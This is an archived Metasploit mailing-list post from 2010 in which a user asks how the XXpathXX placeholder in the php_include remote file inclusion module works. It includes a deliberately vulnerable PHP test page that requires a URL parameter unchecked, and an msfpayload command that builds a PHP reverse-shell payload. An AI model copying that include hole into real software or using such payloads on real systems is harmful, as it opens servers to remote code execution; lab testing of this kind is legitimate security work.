Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

php_include confusion

From: Jeffs <jeffs () speakeasy net>
Date: Mon, 12 Jul 2010 19:07:30 -0400
In metapsloit when using the /unix/webapp/php_include the attacker is asked to include a value for PHPURI such as /slogin_lib.inc.php?slogin_path=XXpathXX
Regarding the XXpathXX value, am I correct to assume this passes through to the metasploit engine to construct an obfuscated string that is then sent to the vulnerable site, appended to the URL automatically?
All documentation and information on using this exploit suggests that if you are not going to use the PHPRFIDB setting, to leave this as "XXpathXX".
However all my experimentation does not send a specific url to the vulnerable site as is demonstrated in several videos on this subject.
I know my rhost and lhost are correct, along with all other settings. The apache server runs php and is accessible. The metapsloit service just hangs at: 

[*] PHP include server started.


index_test.php looks like this:

<html>
<body>
<? require $_GET['include'] ?>
</body>
</html>


and include.php.txt was created properly with msfpayload as such.
./msfpayload php/reverse_php LHOST=192.168.1.101 R > /var/www/include.php.txt 

Both files on the are the web server in the proper directories.
If someone could clarify the XXpathXX value for me that would be greatly appreciated. 

Thanks much

jeffs
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: